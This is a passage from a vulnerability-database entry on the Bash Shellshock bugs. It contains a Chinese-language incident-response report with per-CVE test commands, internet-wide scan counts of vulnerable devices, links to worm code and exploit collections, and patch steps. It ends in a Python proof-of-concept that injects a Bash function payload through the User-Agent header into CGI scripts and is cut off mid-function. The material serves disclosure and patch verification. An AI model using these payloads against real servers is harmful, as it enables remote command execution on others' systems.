href=\"http://blog.knownsec.com/2014/09/bash_3-0-4-3-command-exec-analysis/\">http://blog.knownsec.com/2014/09/bash_3-0-4-3-command-exec-analysis/</a></b></p><p>\u7834\u58f31\u88ab\u4fee\u8865\u540e\uff0c\u53c8\u88ab\u7ed5\u8fc7\uff0c\u51fa\u73b0\u4e86\u7834\u58f32\u3002</p><p><b>\u7834\u58f3</b><b>2</b><b>\uff0c</b><b>CVE-2014-7169</b><b>\uff0c\u6d4b\u8bd5\u65b9\u6cd5\uff1a</b></p><p>env -i X='() { (a)=>\\' bash -c 'echo date'; cat echo</p><p>\u5982\u6267\u884c\u7ed3\u679c\u5982\u4e0b\u5219\u4ecd\u7136\u5b58\u5728\u6f0f\u6d1e\uff1a</p><p>bash: X: line 1: syntax error near unexpected token ='bash: X: line 1: 'bash: error importing function definition for `X'Wed Sep 24 14:12:49 PDT 2014</p><p><b>\u6ce8\uff1a</b><b>CVE-2014-7169</b><b>\u7684\u6f0f\u6d1e\u6e90\u7801\u7ea7\u5206\u6790\u8bf7\u53c2\u8003\uff1a</b></p><p><b><a href=\"http://blog.knownsec.com/2014/09/bash_3-0-4-3-command-exec-patch-bypass-analysis/\">http://blog.knownsec.com/2014/09/bash_3-0-4-3-command-exec-patch-bypass-analysis/</a></b></p><p> </p><p>\u9664\u4e86\u8fd9\u4e24\u4e2a\u6700\u53d7\u5173\u6ce8\u7684\u7834\u58f3CVE\u5916\uff0c\u5728shellshocket.net\u4e0a\u8fd8\u770b\u5230\u4e86\u5176\u4ed6\u51e0\u4e2a\uff0c\u76f8\u6bd4\u4e4b\u4e0b\u5f71\u54cd\u4f1a\u5c0f\u5f88\u591a\uff0c\u8fd9\u91cc\u4e5f\u7b80\u5355\u8bf4\u660e\u4e0b\uff1a</p><p><b>\u7834\u58f3</b><b>3</b><b>\uff0c</b><b>CVE</b><b>\u672a\u77e5\uff0c\u6d4b\u8bd5\u65b9\u6cd5\uff1a</b></p><p>env X=' () { }; echo vulnerable' bash -c 'date'</p><p>\u5982\u679c\u4e0a\u9762\u547d\u4ee4\u8f93\u51fa\u201cvulnerable\u201d\uff0c\u5c31\u610f\u5473\u7740\u6709\u6f0f\u6d1e\u3002</p><p>\u8fd9\u4e2a\u548c\u7834\u58f31\u5f88\u50cf\uff0c\u6ca1CVE\uff0c\u4e0d\u505a\u8bc4\u4ef7\u3002</p><p><b>\u7834\u58f3</b><b>4</b><b>\uff0c</b><b>CVE-2014-7186</b><b>\uff0c\u6d4b\u8bd5\u65b9\u6cd5\uff1a</b></p><p>bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||echo \"CVE-2014-7186 vulnerable, redir_stack\"</p><p>\u5982\u679c\u4e0a\u9762\u547d\u4ee4\u8f93\u51fa\u201cCVE-2014-7186 vulnerable, redir_stack\u201d\uff0c\u5c31\u610f\u5473\u7740\u6709\u6f0f\u6d1e\u3002</p><p><b>\u7834\u58f3</b><b>5</b><b>\uff0c</b><b>CVE-2014-7187</b><b>\uff0c\u6d4b\u8bd5\u65b9\u6cd5\uff1a</b></p><p>(for x in {1..200} ; do echo \"for x$x in ; do :\"; done; for x in {1..200} ; do echo done ; done) | bash ||echo \"CVE-2014-7187 vulnerable, word_lineno\"</p><p>\u5982\u679c\u4e0a\u9762\u547d\u4ee4\u8f93\u51fa\u201cCVE-2014-7187 vulnerable, word_lineno\u201d\uff0c\u5c31\u610f\u5473\u7740\u6709\u6f0f\u6d1e\u3002</p><p><b>\u7834\u58f3</b><b>6</b><b>\uff0c</b><b>CVE-2014-6278</b><b>\uff0c\u6d4b\u8bd5\u65b9\u6cd5\uff1a</b></p><p>shellshocker='() { echo vulnerable; }' bash -c shellshocker</p><p>\u5982\u679c\u4e0a\u9762\u547d\u4ee4\u8f93\u51fa\u201cvulnerable\u201d\uff0c\u5c31\u610f\u5473\u7740\u6709\u6f0f\u6d1e\uff0c\u5426\u5219\u4f1a\u63d0\u793ashellshocker\u672a\u627e\u5230\u547d\u4ee4\u3002</p><p>\u8fd9\u4e2a\u66f4\u50cfbash\u7279\u6027\uff0c\u5c45\u7136\u5f53\u6210\u4e86\u6f0f\u6d1e\u3002</p><p><b>\u7834\u58f3</b><b>7</b><b>\uff0c</b><b>CVE-2014-6277</b><b>\uff0c\u6d4b\u8bd5\u65b9\u6cd5\uff1a</b></p><p>bash -c \"f() { x() { _;}; x() { _;} <<a; }\" 2>/dev/null || echo vulnerable</p><p>\u5982\u679c\u4e0a\u9762\u547d\u4ee4\u8f93\u51fa\u201cvulnerable\u201d\uff0c\u5c31\u610f\u5473\u7740\u6709\u6f0f\u6d1e\u3002</p><p>\u524d\u4e24\u4e2a\u7834\u58f3\u6f0f\u6d1e\uff08\u5c24\u5176\u662f\u7b2c\u4e00\u4e2a\uff1aCVE-2014-6271\uff09\uff0c\u5f71\u54cd\u9762\u5f88\u76f4\u63a5\u5f88\u5e7f\uff0c\u5907\u53d7\u5173\u6ce8\u3002\u4e4b\u540e\u7684\u7834\u58f3\u6f0f\u6d1e\u5728\u5b9e\u9645\u7684\u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\uff0c\u53d1\u73b0\u6bd4\u8f83\u9e21\u808b\uff0c\u4f46\u8fd9\u8bf4\u660e\u4e00\u4e2a\u5f88\u4e25\u91cd\u7684\u95ee\u9898\uff1a\u5b58\u572825\u5e74\u7684Bash\uff0c\u5e76\u672a\u7ecf\u5386\u771f\u6b63\u7684\u5b89\u5168\u8003\u9a8c\uff0c\u8fd9\u4e9b\u5168\u7403\u6d41\u884c\u7684\u5f00\u6e90\u7ec4\u4ef6\uff0c\u6050\u6015\u90fd\u4f1a\u5b58\u5728\u8fd9\u7c7b\u5b89\u5168\u95ee\u9898\u3002</p><h1>3. ZoomEye\u5e94\u6025\u6982\u8981</h1><p>\u8fd9\u4e2a\u7834\u58f3\u6f0f\u6d1e\u786e\u5b9e\u662f\u4e00\u4e2a\u5371\u5bb3\u6781\u5927\u7684\u6f0f\u6d1e\uff0c\u80dc\u4e8e\u4eca\u5e744\u67088\u53f7\u7206\u53d1\u7684\u201c\u5fc3\u810f\u51fa\u8840\u201d\uff0c\u4f46\u7834\u58f3\u6f0f\u6d1e\u7684\u63a2\u6d4b\u65b9\u5f0f\u5f88\u590d\u6742\uff0c\u4e0d\u540c\u7684\u7ec4\u4ef6\u6d4b\u8bd5\u65b9\u5f0f\u6709\u6240\u533a\u522b\uff0c\u5f88\u96be\u8bc4\u4f30\u4e00\u4e2a\u5f71\u54cd\u9762\uff0c\u4f46\u662f\u53ef\u4ee5\u80af\u5b9a\u7684\u662fBash<=4.3\u7248\u672c\u90fd\u53d7\u5f71\u54cd\uff0c\u800cBash\u5728\u81f3\u5c11\u767e\u4ebf\u7ea7\u522b\u6570\u91cf\u7684\u8bbe\u5907\u4e0a\u4f7f\u7528\uff0c\u56e0\u4e3aBash\u662f\u6700\u6d41\u884c\u7684Linux Shell\u3002</p><p>\u6765\u81ea\u77e5\u9053\u521b\u5b87\u7684ZoomEye\u56e2\u961f\uff08\u949f\u9997\u4e4b\u773c\u7f51\u7edc\u7a7a\u95f4\u63a2\u77e5\u7cfb\u7edf\uff09\u901a\u8fc7\u51e0\u79cd\u65b9\u5f0f\u7684\u7ec4\u5408\u68c0\u6d4b\uff0c\u5f97\u5230\u4e86\u4e9b\u5f71\u54cd\u7ed3\u8bba\u3002</p><p><b>\u6ce8\u610f\uff1a\u4ee5\u4e0b\u8fd9\u4e9b\u5f71\u54cd\u90fd\u662f\u53ef\u88ab\u76f4\u63a5\u8fdc\u7a0b\u653b\u51fb\u7684\uff0c\u5c5e\u4e8e\u9ad8\u5371\u7ea7\u522b\uff01</b></p><p><strong>3.1. \u7b2c\u4e00\u7ec4\u6570\u636e</strong></p><p><b>2014/9/26</b></p><p>\u6211\u4eec\u53d1\u73b0\u6df1\u4fe1\u670d\u7684\u5e94\u7528\u4ea4\u4ed8\u7ba1\u7406\u7cfb\u7edf\u5b58\u5728\u7834\u58f3\u6f0f\u6d1e\uff0c\u7ecf\u8fc7ZoomEye\u7684\u7279\u6b8a\u63a2\u6d4b\uff0c\u5927\u9646\u5730\u533a\u8303\u56f4\u5185\u6709<b>13254</b>\u53f0\u8bbe\u5907\u53d7\u5230\u7834\u58f3\u6f0f\u6d1e\u5f71\u54cd\uff0c\u53ef\u88ab\u76f4\u63a5\u8fdc\u7a0b\u653b\u51fb\u3002</p><p>\u5229\u7528\u7834\u58f3\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u76f4\u63a5\u62ff\u5230\u670d\u52a1\u5668root\u6743\u9650\uff1a</p><p><img alt=\"\u56fe\u72471\" src=\"http://blog.knownsec.com/wp-content/uploads/2014/10/%E5%9B%BE%E7%89%871.png\" width=\"1035\" height=\"36\"></p><p><b>2014/10/6</b></p><p>\u518d\u6b21\u5bf9\u8fd9<b>13254</b>\u53f0\u6f0f\u6d1e\u8bbe\u5907\u8fdb\u884c\u9a8c\u8bc1\uff0c\u53d1\u73b0\u8fd8\u6709<b>908</b>\u53f0\u672a\u4fee\u8865\uff0c\u4fee\u8865\u7387\u662f<b>93.1%</b>\u3002</p><p><b>2014/10/14</b></p><p>\u7b2c\u4e09\u6b21\u8fdb\u884c\u9a8c\u8bc1\uff0c\u53d1\u73b0\u8fd8\u662f<b>908</b>\u53f0\u672a\u4fee\u8865\uff0c\u770b\u6765\u8fd9\u4e9b\u8bbe\u5907\u88ab\u9057\u5fd8\u4e86\uff1f</p><p><strong>3.2. \u7b2c\u4e8c\u7ec4\u6570\u636e</strong></p><p><b>2014/9/26</b></p><p>\u7ecf\u8fc7ZoomEye\u7684Fuzzing\u63a2\u6d4b\uff0cFuzzing\u5217\u8868\u5982\u4e0b\uff1a</p><p><br>/cgi-bin/load.cgi<br>/cgi-bin/gsweb.cgi<br>/cgi-bin/redirector.cgi<br>/cgi-bin/test.cgi<br>/cgi-bin/index.cgi<br>/cgi-bin/help.cgi<br>/cgi-bin/about.cgi<br>/cgi-bin/vidredirect.cgi<br>/cgi-bin/click.cgi<br>/cgi-bin/details.cgi<br>/cgi-bin/log.cgi<br>/cgi-bin/viewcontent.cgi<br>/cgi-bin/content.cgi<br>/cgi-bin/admin.cgi<br>/cgi-bin/webmail.cgi<br></p><p>\u5168\u7403\u5927\u6982\u5b58\u5728<b>142000</b>\u4e3b\u673a\u53d7\u5f71\u54cd\uff0c\u9700\u8981\u6ce8\u610f\u7684\u662f\u7531\u4e8eFuzzing\u89c4\u5219\u4e0d\u5b8c\u5907\uff0c\u5f97\u5230\u7684\u6570\u91cf\u80af\u5b9a\u4f1a\u4e0d\u5b8c\u5907\uff0c\u4f46\u8fd9\u4e2a\u6570\u5b57\u81f3\u5c11\u53ef\u4ee5\u770b\u5230\u53ef\u88ab\u76f4\u63a5\u8fdc\u7a0b\u653b\u51fb\u5229\u7528\u7684\u9762\u5f88\u5927\u3002</p><p><strong>3.3. \u7b2c\u4e09\u7ec4\u6570\u636e</strong></p><p><b>2014/9/26</b></p><p>\u6211\u4eec\u770b\u5230masscan\u7684\u5b98\u65b9\u53d1\u5e03\u4e86\u6d88\u606f\uff1a</p><p><a href=\"http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html\">http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html</a></p><p>\u4ed6\u4eec\u5168\u7403\u63a2\u6d4b\u7684\u7ed3\u8bba\u662f\uff1a\u81f3\u5c11<b>150</b><b>\u4e07</b>\u53d7\u5f71\u54cd\uff0c\u800c\u8fd9\u9a8c\u8bc1\u89c4\u5219\u5f88\u7b80\u5355\uff0c\u4ec5\u5bf9\u4e3b\u673a\u768480\u7aef\u53e3\u8fdb\u884c\u76f4\u63a5\u8bf7\u6c42\uff0c\u8fd9\u4e2a\u7ed3\u8bba\u6211\u4eec\u4e5f\u5728\u9a8c\u8bc1\u3002</p><p><strong>3.4. \u7b2c\u56db\u7ec4\u6570\u636e</strong></p><p><b>2014/9/26</b></p><p><b>2014/10/6</b></p><p>\u6211\u4eec\u53d1\u73b0QNAP\u516c\u53f8\u7684NAS\u5b58\u50a8\u8bbe\u5907\u5b58\u5728\u7834\u58f3\u6f0f\u6d1e\uff0cZoomEye\u9488\u5bf9QNAP NAS\u76848080\u7aef\u53e3\u8fdb\u884c\u5927\u89c4\u6a21\u63a2\u6d4b\uff0c\u76ee\u524d\u7684\u8fdb\u5ea6\u5982\u4e0b\uff1a</p><table><colgroup><col width=\"NaN%\"><col width=\"NaN%\"><col width=\"NaN%\"><col width=\"NaN%\"></colgroup><tbody><tr><td>\u56fd\u5bb6/\u5730\u533a</td><td>9/26 \u53d7\u5f71\u54cd\u6570\u91cf\uff08\u53f0\uff09</td><td>10/6 \u53d7\u5f71\u54cd\u6570\u91cf\uff08\u53f0\uff09</td><td>\u4fee\u590d\u7387</td></tr><tr><td>\u5927\u9646</td><td><b>1010</b></td><td>421</td><td>58.3%</td></tr><tr><td>\u53f0\u6e7e</td><td><b>4579</b></td><td>2020</td><td>55.9%</td></tr><tr><td>\u7f8e\u56fd</td><td><b>4633</b></td><td>2363</td><td>49.0%</td></tr><tr><td>\u9999\u6e2f</td><td><b>2492</b></td><td>1284</td><td>48.5%</td></tr><tr><td>\u65e5\u672c</td><td><b>5158</b></td><td>2708</td><td>47.5%</td></tr><tr><td>\u97e9\u56fd</td><td><b>2130</b></td><td>1463</td><td>31.3%</td></tr></tbody></table><p>\u5229\u7528\u7834\u58f3\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u62ff\u4e0bQNAP NAS\u7684admin\u6743\u9650\uff08<b>\u6700\u9ad8</b>\uff09\uff1a</p><p><img alt=\"\u56fe\u72472\" src=\"http://blog.knownsec.com/wp-content/uploads/2014/10/%E5%9B%BE%E7%89%872.png\" width=\"886\" height=\"34\"></p><p>\u4ece\u4e0a\u9762\u56fe\u8868\u7684\u4fee\u590d\u7387\u53ef\u4ee5\u770b\u5230\uff0c\u76f8\u6bd4\u7b2c\u4e00\u7ec4\u901a\u62a5\u8fc7\u7684\u6570\u636e\uff0cQNAP NAS\u7684\u4fee\u590d\u7387\u5e73\u5747\u4e0d\u523049%\u3002\u8fd9\u53cd\u5e94\u6162\u4e86\u5f88\u591a\u3002</p><p><strong>3.5. \u7b2c\u4e94\u7ec4\u6570\u636e</strong></p><p><b>2014/9/27</b></p><p>\u6211\u4eec\u53d1\u73b0CheckPoint\u5b89\u5168\u7f51\u5173\u7b49\u4ea7\u54c1\u5b58\u5728\u7834\u58f3\u6f0f\u6d1e\uff0cZoomEye\u9488\u5bf9CheckPoint\u76f8\u5173\u8bbe\u5907\u768480\u7aef\u53e3\u8fdb\u884c\u5927\u89c4\u6a21\u63a2\u6d4b\uff0c\u5728\u5927\u9646\u5730\u533a\u53d1\u73b0<b>71</b>\u53f0\u53d7\u5f71\u54cd\u8bbe\u5907\u3002</p><p>\u5229\u7528\u7834\u58f3\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u62ff\u4e0bCheckPoint\u76f8\u5173\u8bbe\u5907root\u6743\u9650\uff1a</p><p><img alt=\"\u56fe\u72473\" src=\"http://blog.knownsec.com/wp-content/uploads/2014/10/%E5%9B%BE%E7%89%873.png\" width=\"804\" height=\"32\"></p><p><b>2014/10/14</b></p><p>\u518d\u6b21\u9a8c\u8bc1\u540e\u53d1\u73b0\u8fd8\u6709<b>52</b>\u53f0\u53d7\u5f71\u54cd\u3002</p><p><strong>3.6. \u7b2c\u516d\u7ec4\u6570\u636e</strong></p><p><b>2014/9/27</b></p><p>\u6211\u4eec\u53d1\u73b0Mirapoint\u90ae\u4ef6\u670d\u52a1\u5668\uff08Message Server\uff09\u5b58\u5728\u7834\u58f3\u6f0f\u6d1e\uff0cZoomEye\u9488\u5bf9Mirapoint\u90ae\u4ef6\u670d\u52a1\u5668\u7684443\u7aef\u53e3\u8fdb\u884c\u5927\u89c4\u6a21\u63a2\u6d4b\uff0c\u5728\u5927\u9646\u5730\u533a\u53d1\u73b0<b>36</b>\u53f0\u53d7\u5f71\u54cd\u8bbe\u5907\u3002\u4e4c\u4e91\u7f51\u7ad9\u9488\u5bf9\u8be5\u8bbe\u5907\u6f0f\u6d1e\u4e5f\u8fdb\u884c\u62a5\u9053\uff0c\u5e76\u53d1\u5e03\u4e86\u6f0f\u6d1e\u9884\u8b66\u3002</p><p>\u5229\u7528\u7834\u58f3\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u76f4\u63a5\u62ff\u4e0bMirapoint\u90ae\u4ef6\u670d\u52a1\u5668\u6743\u9650\uff0c\u5e76\u80fd\u8f7b\u6613\u63d0\u6743\u4e3aroot\u3002</p><p><b>2014/10/14</b></p><p>\u518d\u6b21\u9a8c\u8bc1\u540e\u53d1\u73b0\u8fd8\u6709<b>5</b>\u53f0\u53d7\u5f71\u54cd\u3002</p><p><strong>3.7. \u7b2c\u4e03\u7ec4\u6570\u636e</strong></p><p><b>2014/10/6</b></p><p>\u901a\u8fc7XCERT\u5185\u90e8\u7684\u53cd\u9988\uff0c\u6211\u4eec\u9a8c\u8bc1\u4e86AVAYA IP\u7535\u8bdd\u5b58\u5728\u7834\u58f3\u6f0f\u6d1e\u7684\u4e8b\u5b9e\uff0cZoomEye\u9488\u5bf9AVAYA IP\u7535\u8bdd\u7684443\u7aef\u53e3\u8fdb\u884c\u5927\u89c4\u6a21\u63a2\u6d4b\uff0c\u5728\u5927\u9646\u5730\u533a\u53d1\u73b0<b>4</b>\u53f0\u53d7\u5f71\u54cd\u8bbe\u5907\u3002</p><p>\u5229\u7528\u7834\u58f3\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u76f4\u63a5\u62ff\u4e0bAVAYA IP\u7535\u8bdd\u670d\u52a1\u5668\u6743\u9650\u3002</p><p><b>2014/10/14</b></p><p>\u518d\u6b21\u9a8c\u8bc1\u540e\u53d1\u73b0\u8fd9<b>4</b>\u53f0\u8fd8\u672a\u4fee\u8865\u3002</p><p> </p><p>\u53ef\u4ee5\u4ece\u8fd9\u51e0\u7ec4\u6570\u636e\u770b\u5230\uff0c\u63a2\u6d4b\u65b9\u5f0f\u5404\u4e0d\u76f8\u540c\uff0c\u5982\u679c\u7ee7\u7eed\u6269\u5c55\u53ef\u4ee5\u9010\u6b65\u63cf\u7ed8\u51fa\u8d8a\u6765\u8d8a\u6e05\u6670\u7684\u5f71\u54cd\u9762\uff08\u53ef\u76f4\u63a5\u8fdc\u7a0b\u653b\u51fb\uff09\uff0c\u66f4\u591a\u6210\u679c\u8fd8\u5728\u7ee7\u7eed\u3002</p><p>\u901a\u8fc7\u8fd9\u51e0\u7ec4\u6570\u636e\u8fd8\u53ef\u4ee5\u5f97\u51fa\u4e00\u4e2a\u7ed3\u8bba\uff1a\u4e00\u4e9b\u6ca1\u66dd\u5149/\u901a\u62a5\u7684\u8bbe\u5907\uff0c\u4fee\u8865\u6548\u7387\u5f88\u4f4e\uff1b\u4e00\u4e9b\u5df2\u7ecf\u66dd\u5149/\u901a\u62a5\u7684\u8bbe\u5907\uff0c\u4e5f\u6ca1\u6cd5\u505a\u5230100%\u4fee\u8865\u3002</p><h1>4. \u52a0\u901f\u4e50\u4e91\u9632\u5fa1\u5e73\u53f0\u5e94\u6025\u6982\u8981</h1><p>\u622a\u6b62\u65f6\u95f4<b>2014/9/26 12:00</b>\u7684\u7edf\u8ba1\u5982\u4e0b\uff1a</p><p>\u6765\u81ea\u77e5\u9053\u521b\u5b87\u52a0\u901f\u4e50\u56e2\u961f\u7684\u5e94\u6025\u60c5\u51b5\uff0c\u62e6\u622a\u4e86<b>1759</b>\u6b21\u7834\u58f3\u6f0f\u6d1e\u653b\u51fb\uff01</p><p>\u4e0b\u56fe\u4e3a<b>2014/9/25</b>\u7834\u58f3\u6f0f\u6d1e\u6309\u5c0f\u65f6\u6d3b\u8dc3\u8d8b\u52bf\u56fe\uff1a</p><p><img alt=\"QQ\u56fe\u724720141015161422\" src=\"http://blog.knownsec.com/wp-content/uploads/2014/10/QQ%E5%9B%BE%E7%89%8720141015161422.jpg\" width=\"596\" height=\"391\"></p><p>\u4ece\u56fe\u4e2d\u53ef\u89c1\uff0c\u52a0\u901f\u4e50\u4e91\u9632\u5fa1\u5e73\u53f0\u5728\u6f0f\u6d1e\u7206\u53d1\u4e4b\u524d\u5c31\u5df2\u7ecf\u6dfb\u52a0\u89c4\u5219\u3002</p><p><b>2014/9/25</b>\u62e6\u622a\u60c5\u51b5\u5982\u4e0b\uff1a</p><ul><li>\u603b\u5171\u62e6\u622a\u6570\uff1a1,759\u6b21</li><li>\u53d7\u653b\u51fb\u7ad9\u70b9\u6570\uff1a214\u4e2a</li><li>\u653b\u51fb\u6210\u529f\u7ad9\u70b9\u6570\uff1a0\u4e2a</li><li>\u53d1\u8d77\u653b\u51fbIP\u6570\uff1a6\u4e2a</li></ul><p>\u4ece\u52a0\u901f\u4e50\u4e91\u9632\u5fa1\u5e73\u53f0\u53ef\u4ee5\u4fa7\u9762\u770b\u51fa\uff0c\u8fd9\u79cd\u6f0f\u6d1e\u7684\u75af\u72c2\u60c5\u51b5\u3002</p><h1>5. \u5176\u4ed6\u7ed3\u8bba</h1><p>\u901a\u8fc7\u6211\u4eec\u8fde\u591c\u5206\u6790\uff0c\u8fd8\u6709\u4e00\u4e9b\u53ef\u9760\u7ed3\u8bba\u53ef\u4ee5\u4f5c\u4e3a\u53c2\u8003\uff1a</p><p><strong>5.1. \u7834\u58f3\u6f0f\u6d1e\u7684\u8815\u866b\u5df2\u7ecf\u5f00\u59cb\u5168\u7403\u8513\u5ef6\uff0c\u5e94\u8be5\u662f\u5229\u7528masscan\u6765\u8fdb\u884c\u5927\u89c4\u6a21\u690d\u5165\u7684\u3002</strong></p><p>\u8815\u866b\u4ee3\u7801\u5728\u8fd9\uff1a</p><p><a href=\"https://gist.github.com/anonymous/929d622f3b36b00c0be1\">https://gist.github.com/anonymous/929d622f3b36b00c0be1</a></p><p>\u66f4\u591a\u5173\u4e8e\u7834\u58f3\u8815\u866b\u4fe1\u606f\uff0c\u53ef\u4ee5\u53c2\u8003\u5b89\u5929\u7684\u5206\u6790\uff1a</p><p>\u300a\u201c\u7834\u58f3\u201d\u6f0f\u6d1e\u76f8\u5173\u6076\u610f\u4ee3\u7801\u6837\u672c\u5206\u6790\u62a5\u544a\u2014\u2014\u201c\u7834\u58f3\u201d\u76f8\u5173\u5206\u6790\u4e4b\u4e8c\u300b</p><p><a href=\"http://www.antiy.com/response/Analysis_Report_on_Sample_Set_of_Bash_Shellshock.html\">http://www.antiy.com/response/Analysis_Report_on_Sample_Set_of_Bash_Shellshock.html</a></p><p><strong>5.2. DHCP\u670d\u52a1\u53d7\u5f71\u54cd\uff0c\u8fd9\u4e2a\u610f\u5473\u7740\u8fd9\u4e2a\u7834\u58f3\u6f0f\u6d1e\u7edd\u4e0d\u4ec5Linux\u670d\u52a1\u5668\u7684\u4e8b\uff01</strong></p><p>POC\u7ec6\u8282\u5728\u8fd9\uff1a</p><p><a href=\"https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/\">https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/</a></p><p><a href=\"http://d.uijn.nl/?p=32\">http://d.uijn.nl/?p=32</a></p><p><strong>5.3. \u57fa\u4e8eSIP\u534f\u8bae\u7684\u7834\u58f3\u6f0f\u6d1e\u626b\u63cf\u4e5f\u5f00\u59cb\u4e86\uff01</strong></p><p><a href=\"https://github.com/zaf/sipshock\">https://github.com/zaf/sipshock</a></p><p><strong>5.4. \u5728\u7279\u5b9a\u7684\u914d\u7f6e\u4e0b\uff0cOpenVPN\u4e5f\u5b58\u5728\u7834\u58f3\u6f0f\u6d1e\u3002</strong></p><p><a href=\"http://www.darknet.org.uk/2014/10/openvpn-vulnerable-to-shellshock-exploit/\">http://www.darknet.org.uk/2014/10/openvpn-vulnerable-to-shellshock-exploit/</a></p><p><strong>5.5. \u5168\u7403\u8303\u56f4\u5185\u5173\u4e8e\u7834\u58f3\u6f0f\u6d1e\u5229\u7528\u5df2\u516c\u5e03\u7684\u7ec6\u8282\u53ef\u4ee5\u5728\u8fd9\u770b\u5230\uff1a</strong></p><p><a href=\"https://github.com/mubix/shellshocker-pocs\">https://github.com/mubix/shellshocker-pocs</a></p><p>\u4e00\u4e9b\u90ae\u4ef6\u670d\u52a1\u5982\uff1aExim\u3001Qmail\u3001Procmail\u3001Postfix\u7b49\u3002</p><p>\u4e00\u4e9b\u5927\u5382\u5546\uff1aCisco\u3001Juniper\u3001cPanel\u7b49\u3002</p><h1>6. \u4fee\u590d\u5efa\u8bae</h1><p>\u73b0\u5728\u53ef\u4ee5\u6309\u7167\u4e0b\u9762\u65b9\u5f0f\u8fdb\u884cBash\u7684\u5347\u7ea7\u4fee\u590d\uff1a</p><table><colgroup><col width=\"NaN%\"><col width=\"NaN%\"></colgroup><tbody><tr><td>\u64cd\u4f5c\u7cfb\u7edf</td><td>\u5347\u7ea7\u65b9\u5f0f</td></tr><tr><td>Ubuntu/Debian</td><td>apt-get update<br>apt-get install bash</td></tr><tr><td>RedHat/CentOS/Fedora</td><td>yum update -y bash</td></tr><tr><td>Arch Linux</td><td>pacman -Syu</td></tr><tr><td>OS X</td><td>brew update<br>brew install bash<br>sudo sh -c 'echo \"/usr/local/bin/bash\" >> /etc/shells'<br>chsh -s /usr/local/bin/bash<br>sudo mv /bin/bash /bin/bash-backup<br>sudo ln -s /usr/local/bin/bash /bin/bash</td></tr><tr><td>MacPorts</td><td>sudo port self update<br>sudo port upgrade bash</td></tr></tbody></table><p> </p><p>\u5efa\u8bae\u5347\u7ea7\u540e\u6309\u4e0a\u9762\u7684\u65b9\u6cd5\u8bca\u65ad\u662f\u5426\u8865\u4e01\u5b8c\u5168\u3002</p><h1>7. \u76f8\u5173\u8d44\u6e90\u94fe\u63a5</h1><ul><li>ShellShock\u5b98\u7f51\uff1a<a href=\"https://shellshocker.net/\">https://shellshocker.net/</a></li></ul><p>\u6765\u81ea<a href=\"http://blog.knownsec.com/2014/10/shellshock_response_profile_v4/\">http://blog.knownsec.com/2014/10/shellshock_response_profile_v4/</a></p>", "published": "2014-09-26T00:00:00", "type": "seebug", "title": "Bash 4.3 \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\n (\u7834\u58f3)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2014-09-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-88877", "id": "SSV:88877", "sourceData": "\n #!/usr/bin/env python\r\n# coding=utf-8\r\n\r\nimport re\r\nimport sys\r\nimport random\r\nimport string\r\nimport urllib2\r\n\r\nfrom urlparse import urljoin\r\nfrom urlparse import urlparse\r\nfrom urlparse import urlunparse\r\nfrom posixpath import normpath\r\n\r\nfrom comm import cmdline\r\nfrom comm import generic\r\n\r\n\r\npoc_info = {\r\n 'VulId': '1521',\r\n 'Name': 'Bash 4.3 \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e POC',\r\n 'AppName': 'Bash',\r\n 'AppPowerLink': 'http://www.gnu.org/software/bash/',\r\n 'AppVersion': '3.0-4.3',\r\n 'VulType': 'Command Execution',\r\n 'Desc': '''\r\n Bash \u5728\u89e3\u6790\u73af\u5883\u53d8\u91cf\u65f6\uff0c\u4f1a\u89e3\u6790\u51fd\u6570\uff0c\u540c\u65f6\u53ef\u4ee5\u8fd0\u884c\u51fd\u6570\u540e\u7684\u8bed\u53e5\uff0c\u9020\u6210\u547d\u4ee4\u6267\u884c\u3002\r\n ''',\r\n 'Author': ['zhengdt @ knownsec'],\r\n 'VulDate': '2014-09-24',\r\n 'CreateDate': '2014-09-25',\r\n 'UpdateDate': '2014-09-25',\r\n 'References': ['https://www.invisiblethreat.ca/2014/09/cve-2014-6271/'],\r\n 'Version': '1',\r\n}\r\n\r\nio_info = {\r\n 'URL': '',\r\n 'Mode': 'v',\r\n 'Verbose': False,\r\n 'Error': '',\r\n 'Status': 0,\r\n 'Result': {}\r\n}\r\n\r\n\r\ndef main(io_info):\r\n url = io_info.get('URL', '')\r\n mode = io_info.get('Mode', 'v')\r\n verbose = io_info.get('Verbose', False)\r\n headers_fake = {}\r\n\r\n vul_url = None\r\n\r\n if mode == 'v' or mode == 'a':\r\n try:\r\n vul_url = get_url_need(url)\r\n if not vul_url.endswith('.cgi') and not vul_url.endswith('.sh'):\r\n io_info['Error'] = '%s - no vul url' % url\r\n return \r\n\r\n if verbose:\r\n print '[*] %s - Requesting target url ...' % vul_url\r\n random_str = ''.join(random.sample(string.letters+string.digits, 50))\r\n headers_fake['User-Agent'] = '() { :; }; echo; echo X-Bash-Test: %s' % random_str \r\n \r\n try:\r\n response = urllib2.urlopen(urllib2.Request(vul_url, headers=headers_fake))\r\n response = response.read()\r\n except urllib2.HTTPError, e:\r\n response = e.data\r\n\r\n if verbose:\r\n print '[*] %s - Check X-Bash-Test ...' % vul_url\r\n\r\n if 'X-Bash-Test: %s' % random_str == response.split('\\n')[0]:\r\n io_info['Status'] = 1\r\n io_info['Result']['VerifyInfo'] = {}\r\n io_info['Result']['VerifyInfo']['URL'] = vul_url\r\n\r\n except Exception, e:\r\n io_info['Error'] = '[*] %s' % str(e)\r\n return\r\n\r\n\r\ndef get_url(url):\r\n try:\r\n return urllib2.urlopen(url).url\r\n except urllib2.HTTPError:\r\n return url\r\n\r\n\r\ndef fix_url(url):\r\n if not url.startswith('http'):\r\n url = 'http://%s' % url\r\n return 